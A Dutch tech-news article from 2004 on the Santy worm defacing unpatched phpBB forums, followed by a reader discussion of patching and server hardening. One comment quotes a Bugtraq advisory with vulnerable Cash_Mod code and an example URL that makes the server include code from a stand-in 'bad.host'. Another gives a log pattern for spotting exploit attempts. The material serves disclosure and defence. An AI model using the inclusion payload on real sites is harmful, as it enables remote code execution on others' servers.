Santy bestookt phpBB-websites

Op Viruslist.com wordt melding gemaakt van de worm Net-Worm.Perl.Santy.a die het gemunt heeft op phpBB-forums. Door gebruik te maken van een fout in de versies tot 2.0.11 van deze software, slaagt de worm erin alle asp-, php-, htm- en shtm-bestanden te overschrijven met zijn eigen code, waardoor de desbetreffende site 'defaced' wordt. Om nieuwe slachtoffers te vinden maakt deze worm gebruik van Google, wat voor deze zoekmachine de aanleiding geweest is om de queries afkomstig van deze malware te blokkeren. Het is overigens niet de eerste keer dat virussen gebruikmaken van zoekmachines om zichzelf te verspreiden.

Eerder al werden verschillende zoekdiensten belaagd door een variant van Mydoom die op zoek was naar nieuwe e-mailadressen. Nu de verspreiding van de worm tegengehouden wordt en de meeste fora een upgrade gekregen hebben is het volgens Roel Schouwenberg van Kaspersky Labs echter niet waarschijnlijk dat er een nieuwe variant van de Santy-worm zal opduiken, of dat deze indien hij toch verschijnt veel schade aan zal richten.

Defaced door Santy

Door Yoeri Lauwers

Eindredacteur

Feedback • 22-12-2004 11:44 93

22-12-2004 • 11:44

93

Bron: Viruslist

Lees meer

Eerste virus voor StarOffice duikt op
Eerste virus voor StarOffice duikt op Nieuws van 31 mei 2006
NCRV en TROS bouwen automatische moderatie in phpBB
NCRV en TROS bouwen automatische moderatie in phpBB Nieuws van 14 juli 2005
Antivirusbedrijven overspoeld door MyTob-varianten
Antivirusbedrijven overspoeld door MyTob-varianten Nieuws van 5 juni 2005
PHP-ontwikkelaars willen veiligheidsimago verbeteren
PHP-ontwikkelaars willen veiligheidsimago verbeteren Nieuws van 2 februari 2005
MySQL-worm 'MySpooler' valt servers aan
MySQL-worm 'MySpooler' valt servers aan Nieuws van 28 januari 2005
Worm vermomt zich als nieuwsbrief met actuele headlines
Worm vermomt zich als nieuwsbrief met actuele headlines Nieuws van 22 januari 2005
Anti-Santy-worm probeert phpBB-sites te repareren
Anti-Santy-worm probeert phpBB-sites te repareren Nieuws van 3 januari 2005
Santy-makers niet voor één gat te vangen
Santy-makers niet voor één gat te vangen Nieuws van 24 december 2004
Hotmail verkiest Trend Micro boven McAfee voor virusscans
Hotmail verkiest Trend Micro boven McAfee voor virusscans Nieuws van 20 december 2004
Adware begint virusachtig gedrag te vertonen
Adware begint virusachtig gedrag te vertonen Nieuws van 17 december 2004
Netsky blijft virus top tien van Sophos aanvoeren
Netsky blijft virus top tien van Sophos aanvoeren Nieuws van 3 december 2004
Symbian-trojan 'Skulls' duikt op in het wild
Symbian-trojan 'Skulls' duikt op in het wild Nieuws van 21 november 2004
Google populair bij hackers
Google populair bij hackers Nieuws van 30 juli 2004
Nieuwe variant MyDoom belaagt zoekmachines - Update
Nieuwe variant MyDoom belaagt zoekmachines - Update Nieuws van 27 juli 2004
Meer producten en artikelen
Bedrijfsnieuws

Reacties (93)

-Moderatie-faq
93
93
49
18
1
30
Wijzig sortering
Heineken 22 december 2004 11:51
Ik heb zojuist m'n phpBB-forum al gepatched met de code van het phpBB.com forum. Op GoT loopt er ook een topic over en op isc.sans.org is ook veel informatie te vinden. In de logs hier kwam ik trouwens al een paar pogingen tegen, gelukkig blokkeert Google het nu.
Blokker_1999
@Heineken22 december 2004 17:23
Het is idd een oude bug die al lang gepatched is. Zelf hebben ze bij mij (forum.mtavc.com) ook veel schade aangericht een dag nadat de bug bekend was. Uiteraard nadien men backup terug gezet en gepatched. Op dat moment was 2.0.11 nog niet vermeld op de meuktracker en ook op andere plaatsen waar ik kom was nog geen vermelding. Pas na het kwaad geschiet was heb ik overal de melding gekregen.

Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken. De enigste mogelijkheid is dus regelmatig de phpBB site checken. En zelfs dan kan je nog te laat komen.

De bug ontstaat uit de functie urldecode die gebruikt word in de highlight functie in viewtopic.php (bij zoeken word deze gebruikt). En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip. De bug laat toe om commando's via php exec uit te voeren. Je kan dus veel verwijderen, zeker als je de directory structuur een beetje kent.
mosymuis @Blokker_199922 december 2004 19:56
Het is spijtig dat phpBB zelf geen mailinglist heeft voor dit soort zaken.
Dat hebben ze wel: klik. Bovendien kan je je abonneren op de list van phpBBhacks, een zeer actieve fan community.
En guests kunnen dus ook deze bug misbruiken zonder enig spoor na te laten van ip.
Access logs, anyone? Gewoon even zoeken naar GET requests met %2527%252e in de uri.
De bug laat toe om commando's via php exec uit te voeren.
De bug laat toe om zowat elk PHP commando uit te voeren. exec en system zijn slechts voorbeelden van de ontdekster Jessica Soules (howdark.com).
demonite @mosymuis23 december 2004 10:46
dan moet je php maar in safe_mode draaien
Websmurf @mosymuis23 december 2004 12:07
@demonite

safe mode is een slechte oplossing voor dit probleem.
safe mode is zowieso een slechte manier om shared server problemen op te lossen.
The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now
Boozman @Heineken22 december 2004 16:19
Ehhhm, AL gepatched ? Een belangrijke fout in phpbb waar al een patch voor uitkwam in november heb je nu AL gepatched ?? :Y)
Verwijderd @Boozman22 december 2004 17:23
Zolang je site niet van levensbelang voor je is, zie ik niet in waarom je elke dag de phpBB site moet checken om te kijken of er een update is ;)

Eens per maand lijkt me dan ruim voldoende, alleen is dit wel een erg kritieke fout natuurlijk, en iets ernstiger dan het verneuken van de lay-out of iets dergelijks.
Hodgesaargh @Verwijderd22 december 2004 18:05
En stond dus ook ruim een maand geleden al op bugtraq.


To: bugtraq@securityfocus.com
Subject: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)

Hi all


phpBB is a very popular message board using modules extensions.


One of these module ­ Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.


Let’s start :


In file /admin/admin_cash.php


…..
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
….


First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but
$phpbb_root_path & .$phpEx ­ are *NOT* define yet!


I don’t know why, but someone decided to define these variables later in the code :


……
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


…..


Well, any user can rewrite these parameters with GET or POST requests.


Example :
http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root _path=http://bad.host/


Fix :
Set all default parameters after “if ( !empty($setmodules) )”


Example :


//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);


if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);


Thank you rofl!
Blokker_1999
@Verwijderd22 december 2004 17:38
Bug is van 18/11, meer dan een maand oud dus.
Makkelijk @Verwijderd23 december 2004 11:12
Waar maken jullie je toch allemaal druk om :+
Schmiel 22 december 2004 12:16
Deze lek is al langer dan een maand geleden beschreven door de makers van phpBB. als je secuur genoeg bent met alle scripts die je draait, dan had je het forum allang geupdate. Desalnietemin erg vervelend voor de gedupeerden. Dit is misschien een wakkermakertje voor de minder oplettende systeembeheerder/websiteontwikkelaar.
Verwijderd @Schmiel22 december 2004 13:03
Vergeet niet dat veel onderdelen die op een forum draaien vaak niet werken op een nieuwe versie. Het is dan best wel veel werk om alles weer aan te passen dan...
Verwijderd @Verwijderd22 december 2004 13:27
waar je meer als een maand de tijd voro hebt gehad, oftewel geen excuus.
HeepH @Schmiel22 december 2004 15:32
ja daar kom ik inderdaad ook elke week, want ik heb mijn forumpje voor de gein voor een paar vriend gehost en bezoek dus elke week voor hun en mijn veiligheid dat forum
TimDJ 22 december 2004 12:30
Ik ging eens kijken op google en verbaas me echt over de hoeveelheid sites die hiermee te maken hebben (gehad)
zie:
http://www.google.nl/search?hl=nl&q=%22this+site+is+defaced%21%21%21%2 2&lr=
number3 @TimDJ22 december 2004 12:45
Zo'n 1500 sites ongeveer. Je kunt zelfs zien dat er tenmisnte 24 generaties van de worm actief zijn geweest. Ik neem aan dat de maker van deze worm gelijk zo veel mogelijk achterdeurtjes geïnstalleerd heeft, want anders heeft zo'n vernietigende aanval helemaal geen zin.
jp @number322 december 2004 17:48
Waarom?
Als je defaced bent zet je toch je backup terug, en patched het geheel?
Verwijderd 22 december 2004 14:50
Ik heb vrij weinig medelijden met de "gedupeerden".
Nou, realiseer je wel dat er heel wat goedbedoelende mensen zijn met minimale kennis van IT die via dit soort gebruikersvriendelijke software toch een forumpje kunnen hosten. Mensen die dus nooit op IT gerichte fora, mailinglists of andere plaatsen komen en dus niets wisten van deze zaken en dat het liefst ook zo hadden gelaten. Of vind je dat internet alleen voor IT nerds is ofzo? Ik begrijp die hele houding niet, het is toch niet de schuld van het slachtoffer dat iemand/iets door zijn niet waterdichte beveiliging glipt? Dat is toch de schuld van de dader?
Daventry @Verwijderd22 december 2004 14:55
Ik vind dat je als eigenaar van een community/forum/site de plicht hebt om op de hoogte te blijven van de software die draait.

Dat je als eigenaar van een site niet verantwoordelijk bent voor de gevolgen van een fout in apache, akkoord (dat is meestal de verantwoordelijkheid van je hosting provider) maar voor de software die je draait vind ik dat je zelf verantwoordelijk bent - en als je dat niet kan wegens een gebrekkige kennis moet je het maar door iemand anders laten doen.

Stel je voor dat die exploit nu eens alle users en hun email adres uit de database had gehaald en die dan lekker had beginnen spammen ... dat had vrij zuur geweest. Ik vind dat je als eigenaar van de site een zekere "verantwoordelijkheid" hebt tov je leden
mullah @Daventry22 december 2004 16:58
Dus de onwetende beheerders zijn maar ten dele schuldig :)

De fout komt namelijk voor in combinatie met php versies van voor 4.3.10, en da's nou weer de verantwoordelijkheid van de admin.

Best wel een klote worm trouwens, een bekende zijn site was inderdaad defaced omdat iemand anders op de shared hosting server een phpBB had die gehackt was... slechte beurt van de provider die de accounts niet goed had gescheiden.
Sfynx @mullah23 december 2004 01:52
De fout komt namelijk voor in combinatie met php versies van voor 4.3.10, en da's nou weer de verantwoordelijkheid van de admin.
Nee, dat is een andere bug, waarmee je de inhoud van config.php van phpBB kan opvragen (dus de database account gegevens!).Waat phpBB overigens geen schuld aan heeft, omdat het een bug is in PHP zelf.

Denk dus niet dat je met je oude phpBB veilig zit voor de Santy worm als je PHP 4.3.10 of 5.0.3 gebruikt ;)
Verwijderd @Verwijderd22 december 2004 15:57
tja als ze regelmatig de phpbb site gechecked hadden hadden ze geweten dat er steeds nieuwe versies uitkomen, en ook het update systeem is zeer gebruiksvriendelijk.
AteZ @Verwijderd22 december 2004 15:27
inderdaad, de enige waar je medelijden mee moet hebben is dat figuur dat het virus heeft geschreven :'(
BVGorp 22 december 2004 12:01
meer informatie over het virus:

http://www.webwereld.nl/nav/trillian?20359
Verwijderd 22 december 2004 19:12
Het was al lang duidelijk toen deze update uitkwam dat er problemen gingen komen, heb het hier ook al aangehaald: http://www.tweakers.net/meuktracker/7828

PHPBB heeft overigens een zeer slechte reputatie op security gebied. Zowat elke versie > 2.0.0 heeft een ernstig lek gedicht. Ik had gehoopt dat het intussen zowat volledig dicht ging zitten, maar ik vrees ervoor. :( Een goed advies: zorg dat je *altijd* de laatste versie draait van dit pakket.
mosymuis @Verwijderd22 december 2004 20:01
Een goed advies: zorg dat je *altijd* de laatste versie draait van dit pakket.
Die tip kan je aanhalen voor elk stukje software. Elke ontwikkelaar maakt veiligheids fouten, en dan kan je het maar beter treffen met phpBB, omdat die er telkens als de kippen bij zijn met updates zodra het weer mis gaat. Als voorbeeld hoe het niet moet kunnen we Microsoft pakken: 's werelds machtigste softwarebakker speelt het ook keer op keer klaar nieuwe gaten te leveren, met als groot verschil dat zij niet zo rap zijn met updates. Voor Intenet Explorer en Windows staan krieke fouten vaak weken tot maanden open, of erger.
Verwijderd 22 december 2004 13:06
afgelopen tijd af ik vaak een guest op m'n forum. Ik vond het vreemd dat het steeds dezelfde was. Dus na een lookup bleek dit msnbot.msn.com en ook googlebot te zijn.
maar dat zal dus hiermee te maken hebben
Verwijderd @Verwijderd22 december 2004 13:16
Nope, dat zijn de robot's van Google en MSN. Deze robot's zijn geautomatiseerd en verzamelen data wat de zoekmachines gebruiken voor het indexeren van sites.
GX @Verwijderd22 december 2004 13:30
Nee, dat heeft hier helemaal niets mee te maken;

Er staat in de useragent van die bots meestal een link naar een uitleg pagina; dus lees je access.log er maar op na.
Verwijderd @Verwijderd22 december 2004 13:16
Nee dat heeft hier niks mee te maken.
googlebot, msnbot, etc.. indexen gewoon je site, meer niet, dit is normaal gedrag.
kodak
22 december 2004 12:11
Nmm is het gewoon onverantwoord om phpBB voor je site te gebruiken, tenzij deze beveiligd is met normale http gebruikers authenticatie of niet van buitenaf bereikbaar is. De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken. Toch wordt het door website beheerders zeer geregeld standaard maar toegepast voor het gemak. Op veiligheid wordt kennelijk niet meer gelet. Hopelijk zorgt deze worm voor wat meer bewustwording van de gevaren.
mosymuis @kodak22 december 2004 16:39
Je denkwijze is begrijpelijk, maar je beredenatie zeer zeker niet.
De laatste maanden zijn er tientallen exploits gepubliceerd en daarvoor is het ook nooit een veilige software gebleken.
Hoewel ik toe moet geven dat sommige lekken, vooral de XSS holes van voor < 2.0.10, dom en onnodig waren, is het onzin dat phpBB onveilig is vanwege zijn vele updates het afgelopen jaar. Als je ook maar een flauw benul had hoeveel forums wereldwijd dit systeem gebruiken, begrijp je de motivatie achter securitygroepen om het beestje te kunnen kraken. Andere open source forum systemen ljken nu veiliger omdat ze minder aandacht krijgen van deze mensen. In mijn ogen is dat alleen maar schadelijker, want feitelijk betekent dat dat de veiligheidslekken dan blijven bestaan. Geen enkel dynamisch script met de omvang van phpBB is 100% veilig, het is en blijft een voortdurend proces.
Op veiligheid wordt kennelijk niet meer gelet.
Hoe verklaar je dan de snelle response waarmee phpBB uren nadat kritische lekken gemeld worden, patches released? Doet de uitmuntende support op de internationale en nationale phpBB forums je niets? Of hamert phpBB naar jouw mening niet genoeg op de risico's van niet upgraden? Vier officiële info threads op de frontpage over één exploit lijken mij ruim voldoende namelijk.
kodak
@mosymuis22 december 2004 22:14
Ik vind mijn redenatie absoluut niet ongegrond. Ik heb het hier niet over onveiliger, maar gewoon dat het door de omstandigheden niet veilig is.
Het is natuurlijk niet vreemd dat een van de meest gebruikte webtools ook het meest aangevallen wordt, maar dat creeert op dit moment wel al een behoorlijke tijd dat het dus ook niet veilig genoeg is. Ziet vandaag een van de voorbeelden voor wie zn tool niet tijdig heeft geupdate.
Wat betreft die snelle responce: die zijn helaas oorzaak van onopgemerkte securitybugs die in definitieve releases zitten. Kijk eens even bij packetstormsecurity.nl oid en tel het aantal exploits die snel achter elkaar gevonden worden. Ja, een tool dat veel wordt gebruikt maakt grote kans om aangevallen te worden op zoek naar bugs, maar ze zitten er dus zeer vaak ook gewoon nog in ook. Als ik zou moeten kiezen bij een makkelijke tool dat een behoorlijk risico met zich mee brengt hoe dat beveilgd moet worden dan is die keus niet moeilijk gemaakt. Maar kennelijk denken daar veel mensen anders over, en ziet hier het resultaat van dat negerende gedrag.
Sfynx @kodak23 december 2004 01:14
En als jouw favoriete forum nou door iedereen gebruikt en aangevallen wordt, en niemand update tijdig bij het uitkomen van een vulnerability, is dat forum dan toch beter? Dezelfde omstandigheden dan IMO. Dus geen reden om phpBB te gaan bashen.
Verwijderd @kodak22 december 2004 12:16
onzin kodak. als je zorgt dat je altijd up to date bent is het echt meer dan 99,9% veilig. bovendien zou je dan ook niet met linux/unix (zijn onlangs nog 40 tallen exploits in gevonden)kunnen werken. geen een stuk scriptwerk is exploit vrij zelfs (nou ja) microsoft niet.
kodak
@Verwijderd22 december 2004 21:14
Niks onzin. Phpbb is het meest onveilige (meest buggy en meest aangevallen) webonderhoud tool van de afgelopen jaren. Het is de harde realiteit dat veel gebruikers phpbb als makkelijke oplossing zien om iemand zn site te laten beheren en er na implementatie niet meer omkijkt naar het updaten. Zelfs als er al aan wordt gedacht om te updaten wordt dat vaak nog te laat gedaan ook. Kortom, je bent dus wel degelijk veiliger af als je het niet open en bloot op het internet gebruikt.
smaij 22 december 2004 12:00
Mijn server is zaterdagavond 18 december dus gedefaced. Omdat niet alle sites in php safe mode draaien waren alle sites het slachtoffer van waarschijnlijk deze bug in phpBB. Precies kunnen we het niet zeggen want schijnbaar vinden ze het ook leuk /var/log leeg te gooien.

De server draait nu gelukkig weer, maar het heeft mij wel mijn zaterdagnacht en zondag gekost en ook gister en eergisteren nog bezig geweest!
borft @smaij22 december 2004 12:08
hoe kan dat ding /var/log leeg gooien? /var/log is toch niet schrijfbaar voor de www user?
smaij @borft22 december 2004 12:16
Dat vond ik ook wel vreemd. maar ik heb niet zoveel verstand van linux enzo, daarvoor heb ik de serverbeheerder..

Ik dacht zelf dat aangezien apache in die logs moet kunnen schrijven ze ook rechten hebben op /var/logs en apache is toch www user
_JGC_ @smaij22 december 2004 14:19
Apache onder root account? dan ben je wel een ontiegelijke nono, want dan heb je apache gecompileerd met -DBIG_SECURITY_HOLE. Apache weigert nml te draaien als root.

Nee, sommige sites vinden het handig om de logs in de dir van de gebruiker te schrijven of iets dergelijks, zodat de klant zelf bij zijn apache logs kan. Blijkbaar laten ze schrijfacties toe, wat ervoor zorgt dat de worm deze ook weg kan gooien.

Sinds maandag draaien we hier alle sites met php4-cgi en mod_fastcgi en de suexec wrapper, alle sites draaien onder het UID van de klant. Hierdoor kunnen klanten niet meer aan elkanders spullen en hebben wormen geen grote invloed op de server over het algemeen. OK, de worm heeft nu de volle rechten om de userdir leeg te gooien, maar dat had ie toch al omdat anders upload scrips niet werken :X
-=bas=- @smaij22 december 2004 14:10
Bij veel servers draait Apache onder de root account dus kan je de var/log zo leeg gooien _als_ je eenmaal toegang hebt.
mxcreep @smaij22 december 2004 14:27
@Jan de Groot
Onder cgi of fast-cgi draaien van apache is ook niet altijd een optie ondanks dat het wel makkelijker is om het veilig te krijgen...
Je mist een aantal environment variabelen die in mod_php wel beschikbaar zijn en op een druk bezochte server ga je ook de vertraging van de cgi wrapper tov mod_php wel merken...
_JGC_ @smaij23 december 2004 08:47
@mxcreep:
Mag jij me uitleggen welke variabelen dat zijn. In eerste instantie had ik problemen met $SERVER["SCRIPT_NAME"] die verwees naar de php binary, dit was snel opgelolst met een php.ini setting (fix path info of iets dergelijks, zie commentaar in php.ini :P). Verder kopieert PHP zelf al een heleboel variabelen uit $ENV naar $_SERVER. Ik heb tot nu toe nog geen scripts gezien die niet werken met de CGI versie.

De fastcgi methode heeft iets meer overhead dan de module versie, maar valt genoeg mee:
- request komt binnen, php wordt met suexec gestart, wat even traag is als een CGI request
- volgende requests worden gebalanceerd over 10 runnende fastcgi PHP instanties, je merkt hier niet meer dat je een CGI versie draait, het gaat even snel als de module versie.
- Na een seconde of 20 inactiviteit op de site gooit de process manager de boel weer uit, blijkbaar zijn de PHP processen niet meer nodig.

Het voordeel is dat je dat ding kunt wrappen met suexec en dat je voor statische HTML niet continu die grote PHP module met al zn brakke libs mee hoeft te zeulen, die zitten in je CGI binary, die alleen actief is als er PHP requests voor de klant zijn.
Verwijderd @smaij22 december 2004 12:42
Gedefaced dmv. deze worm of wat anders?
18 dec is namelijk erg vroeg...
smaij @Verwijderd24 december 2004 11:01
Nee was niet deze worm.
Was de simiens groep.

plaats 10 op http://www.zone-h.org/en/hallofshame

:(
foppe-jan 22 december 2004 13:01
wat is het toch knap werk van ze zeg.. wauw.. eerst scriptkiddies die zo sites "hacken", en nu zelfs mensen die er virusjes voor schrijven.. wat motiveert die stakkers toch? "erkenning"?
kodak
@foppe-jan22 december 2004 22:19
Die motivatie is helaas waarschijnlijk deels te danken aan de slechte aandacht die de gebruikers van phpbb hebben om tijdig te patchen en genoeg beveiligingsmaatregelen te nemen. Gelegenheid maakt de dief. In dit geval steelt de wormschrijver de controle over de site om te laten zien hoe makkelijk het ken en hoe makkelijk diegene dat voor elkaar kreeg.
Verwijderd @kodak23 december 2004 14:39
Daarnaast is het upgraden naar een nieuwe versie gewoon een bitch, zeker als jeje forum gecustomized hebt...

Een goed plugin systeem, waarmee je ook gemakkelijk patches zou kunnen installeren zou DE oplossing zijn.
mxcreep @foppe-jan22 december 2004 14:30
Tiz maar wat je een virus noemt...ben dat ding al enkele malen tegengekomen, stukje perl wat een socket opent en daar wat ge-escapte karakters heen smijt....
mosymuis @mxcreep22 december 2004 16:26
Tiz maar wat je een virus noemt
Het is geen virus, het is een worm. Een worm heeft geen host nodig, en kan functioneren zonder verdere actie van de gebruiker. (8>

En hoe het werkt doet er niet eens zo toe, de resultaten liegen er niet om. Wel opvallend dat phpBB gebruikers nu eindelijk eens flink met de neus op de cijfers gedrukt worden. Alle waarschuwingen op de phpBB sites ten spijt, blijkbaar is er een virus nodig om mensen te laten upgraden.

Je moest eens weten hoeveel grote forums nog op sterk verouderde versies draaien, vaak met enkele duizenden leden. Een bekend Nederlands forum waar 7.383 filmliefhebbers geregistreerd staan speelt het zelfs nog klaar om nog op 2.0.4 te draaien; 7 versies achter. :o Dat is gewoon onverantwoord, voor je jezelf én je leden. Je behoort de veiligheid ten alle tijden voorop te stellen, zeker als je zo groot bent.
White Dust @mosymuis22 december 2004 17:50
lol... daar zitten nog veel ernstigere fouten in, meen ik te herinneren... zoals dat je als user admin recten kunt verwerven ;)

Maar goed... het is inderdaad gewoon dom om updates niet zo snel mogelijk te instaleren... en het argument van zwaar gemodificeerde forum is ook onzin, de meeste modificaties werken nog wel en mochten ze niet werken zijn de autewurs er wel snel genoeg bij om hem wel werkende te krijgen.

Edit/offtopic: Hey, mosymuis... bekende naam ;) de usernote mod, is het niet :P
mosymuis @mosymuis22 december 2004 18:04
lol... daar zitten nog veel ernstigere fouten in, meen ik te herinneren... zoals dat je als user admin recten kunt verwerven
Ernstiger? We hebben het hier over PHP executie; jezelf benoemen tot admin behoort dus óók tot de mogelijkheden. :) Dat maakt dit lek naar mijn weten het ernstigst in phpBB's geschiedenis.

// offtopic
En inderdaad. ;)
Sfynx @mosymuis23 december 2004 02:06
Als er een oud versienummer staat, hoeft het in principe niet vulnerable te zijn :) Ik ken genoeg mensen die zodanig hebben zitten hakken en breken in hun forumcode, dat het bijhouden van hun eigen veranderingen voor de updates meer tijd kost dan het simpelweg handmatig patchen van de vulnerabilities in hun gemodde forum. Custom versienummertje (2.0.4-zwaargepatched o.i.d ;)) is dan leuk, maar wordt niet altijd gedaan.

Op dit item kan niet meer gereageerd worden.

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq